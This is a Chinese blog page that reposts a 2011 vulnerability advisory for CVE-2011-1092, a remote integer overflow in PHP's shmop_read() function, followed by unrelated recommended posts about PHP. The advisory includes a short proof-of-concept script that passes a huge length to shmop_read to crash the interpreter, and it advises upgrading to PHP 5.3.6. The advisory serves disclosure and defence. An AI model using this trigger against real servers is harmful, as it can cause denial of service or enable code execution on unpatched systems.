php ->read(),PHP “shmop_read()”远程整数溢出漏洞

最新推荐文章于 2022-10-09 17:22:09 发布
最新推荐文章于 2022-10-09 17:22:09 发布
阅读量294 收藏
点赞数
文章标签: php ->read()
这篇博客详细介绍了PHP中shmop_read()函数存在的远程整数溢出漏洞,该漏洞可能导致远程攻击者在受影响的网络服务器上执行任意代码或引发拒绝服务。测试方法和建议的补丁措施也一并提供。建议使用PHP 5.3.6及以上版本以避免此问题。
摘要由CSDN通过智能技术生成

发布日期:2011-03-08

更新日期:2011-03-08

受影响系统:

PHP PHP 5.x

不受影响系统:

PHP PHP 5.3.6

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 46786

CVE ID: CVE-2011-1092

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的"shmop_read()"函数在实现上存在远程整数溢出漏洞,远程攻击者可利用此漏洞在受影响网络服务器中执行任意代码,造成拒绝服务。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jose Carlos Norte ()提供了如下测试方法:

<?php

$shm_key = ftok(__FILE__, 't');

$shm_id = shmop_open($shm_key, "c", 0644, 100);

$shm_data = shmop_read($shm_id, 1, 2147483647);

//if there is no segmentation fault past this point, we have 2gb of

memory!

echo $shm_data;

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

摘星的猪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP 读取文件的正确方法
潇湘博客
05-16 859
fopen 方法可能是以前的 C 和 C++ 程序员最熟悉的,因为如果您使用过这些语言,那么它们或多或少都是您已掌握多年的工具。对于这些方法中的任何一种,通过使用 fopen(用于读取数据的函数)的标准方法打开文件,然后使用 fclose 关闭文件,如清单 1 所示。清单 1. 用 fgets 打开并读取文件
php-7.3.10.tar.gz
07-23
PHP 7.3.10在Linux系统中构建LNMP环境详解》 PHP(Hypertext Preprocessor)是一种广泛使用的开源服务器端脚本语言,尤其适用于Web开发,可嵌入到HTML中使用。PHP 7.3.10是其在2019年发布的一个稳定版本,为...
使用read()函数遇到的坑
最新发布
qq_41937509的博客
10-09 647
出现的问题:只要在包含read()函数的循环中,有printf()且printf中输出无换行符\n,则read()函数会一直阻塞,直到输入quit跳出循环,终端会一次性输出之前所有要输出的数据。解决办法:read()函数所在的while循环printf任意一处加上\n,即可解决。功能:实现pipe父子通信。
php shmop 内存读写操作
weixin_30299709的博客
02-21 263
shmop php在linux上操作共享内存的函数 关于php操作内存,我选择了shmop扩展,其方法只有6个: shmop_open 打开内存块. shmop_write 向内存块中写入数据 shmop_size 获得内存块大小 shmop_read 读取内存块数据 shmop_delete 删除内存块数据 shmop_close 关闭内存块 ...
php read,PHP: Readline 函数 - Manual
weixin_31052141的博客
03-12 153
Readline only reads the window size on startup or on SIGWINCH. This means if the window is resized when not in a readline() call, the next call will have odd behavior due to confusion about the windo...
php内存破坏漏洞利用,PHP shmop模块写任意内存漏洞
weixin_35890184的博客
04-01 157
受影响系统:PHP PHP 5.0.2PHP PHP 5.0.1PHP PHP 5.0.0PHP PHP 4.3.9PHP PHP 4.3.8PHP PHP 4.3.7PHP PHP 4.3.6PHP PHP 4.3.3PHP PHP 4.3.2PHP PHP 4.3.1PHP PHP 4.3.0PHP PHP 4.2.3PHP PHP 4.2.2PHP PHP 4.2.1PHP PHP 4.2....
php-7.1.29.tar.gz.zip
02-16
--enable-shmop \ --enable-simplexml \ --enable-sockets \ --enable-sysvmsg \ --enable-sysvsem \ --enable-sysvshm \ --enable-wddx \ --with-libxml-dir \ --with-xsl \ --enable-zip \ --enable-...
php-7.3.0.tar.gz
12-24
./configure --prefix=/usr/local/php --exec-prefix=/usr/local/php --bindir=/usr/local/php/bin --sbindir=/usr/local/php/sbin --includedir=/usr/local/php/include --libdir=/usr/local/php/lib/php --mandir=...
php-7.2.15.rar
12-31
--with-xsl --enable-shmop --enable-sysvsem --enable-sysvshm --enable-sysvmsg --enable-sockets --with-mhash \ --with-zlib --with-gettext --enable-zip --disable-rpath --enable-inline-optimization --...
php-7.0.27.tar.gz
07-30
编译 ./configure --prefix=/usr/local/php --exec-prefix=/usr/local/php --bindir=/usr/local/php/bin --sbindir=/usr/local/php/sbin --includedir=/usr/local/php/include --libdir=/usr/local/php/lib/php --...
PHP读取文件函数/写入文件函数
逸风的专栏
12-24 584
<br /><?php<br />//读取文件函数<br />function readfromfile($file_name) { <br />if (file_exists($file_name)) { //PHP开源代码<br />$filenum=fopen($file_name,"r"); <br />flock($filenum,LOCK_EX); <br />$file_data=fread($filenum, filesize($file_name)); <br />rewind($file
PHP中进程间共享变量 shmop
静心斋
03-22 7680
类似于 asp中的 application 实现多用户的缓存共享进程间共享变量 用户在一个Web应用程序中导航时,如果能在Web服务器上存储用户或会话的特定数据,从而每次请求网页时能很容易地访问这些数据,将非常有用。存储的可以是有关用户、用户首选项的信息,或者是与应用程序相关的数据,如购物车中的数据。用户每次请求包含session_start()
关于read函数的一些分析
weixin_30768661的博客
05-28 335
1 ssize_t readn(int fd, std::string &inBuffer, bool &zero) 2 { 3 ssize_t nread = 0; 4 ssize_t readSum = 0; 5 while (true) 6 { 7 char buff[MAX_BUFF]; 8 ...
php共享内存编程,php操作共享内存shmop类如何使用
weixin_39907939的博客
03-12 163
php操作共享内存shmop类如何使用发布时间:2020-10-19 16:41:00来源:亿速云阅读:74作者:小新这篇文章将为大家详细讲解有关php操作共享内存shmop类如何使用,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。SimpleSHM 是一个较小的抽象层,用于使用 PHP 操作共享内存,支持以一种面向对象的方式轻松操作内存段。在编写使用共享内存进行...
php zipread,PHP zip_read()用法及代码示例
weixin_42501881的博客
03-28 202
zip_read()函数是PHP中的内置函数,用于读取打开的zip存档中存在的实体。将读取zip资源并将其作为参数发送到zip_read()函数,并且成功返回zip归档文件中包含文件的资源,如果没有更多条目要读取,则返回FALSE。用法:zip_read( $zip )参数:该函数接受强制的单个参数$zip。用于指定邮政编码条目资源。返回值:成功返回zip存档中包含文件的资源,如果没有要读取的条目...
php操作共享内存shmop类及简单使用测试(代码)
weixin_30680385的博客
06-06 125
SimpleSHM 是一个较小的抽象层,用于使用 PHP 操作共享内存,支持以一种面向对象的方式轻松操作内存段。在编写使用共享内存进行存储的小型应用程序时,这个库可帮助创建非常简洁的代码。可以使用 3 个方法进行处理:读、写和删除。从该类中简单地实例化一个对象,可以控制打开的共享内存段。 类对象和测试代码 <?php //类对象 namespace Simple\SHM; ...
PHP:以共享内存shmop系列函数从网关读取数据
fq_fly的博客
09-30 342
共享内存shmop系列函数: shmop_close : Close shared memory block(关闭共享内存块) shmop_delete: Delete shared memory block(删除共享内存块) shmop_open: Create or open shared memory block(创建或打开共享内存块) shmop_read: Read data from...
php简单使用shmop函数创建共享内存减少服务器负载
weixin_30786617的博客
06-03 91
在之前的一篇博客[了解一下共享内存的概念及优缺点]已经对共享内存的概念做了说明。下面就来简单使用共享内存(其实也可以用其他工具,比如redis) PHP做内存共享有两套接口。一个是shm,它实际上是变量共享,会把对象变量序列化后再储存。使用起来倒是挺方便,但是序列化存储对于效率优先的内存访问操作而言就没啥意义了。另外一个是shmop,它是Linux和Windows通用的,不过功能上比shm弱了一...
PHP shmop_open shmop内存共享 进程更改监听 命令执行输入 IPC 进程通讯
Webben
11-27 213
PHP shmop_open shmop内存共享+* 简单的例子 假如 A 进程在等在B是否有更新 ,有更新的话 A 进程再进行执行 比如现在有个天气预报的设备, 如果天气差异大的话就进行数据更新, 此时可以把数据放到 IPC中, 然后 PHP 监听 进程内容改变, 如果改变了 就进行数据库入库,再用监听者模式 告诉底下的API,天气预报更新了 然后API端会来到你这里获取新的天气情况 shmop主要函数 具体操作 shmop_open (创建或打开共享内存块)、shmop_write (向共享内存块中写入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值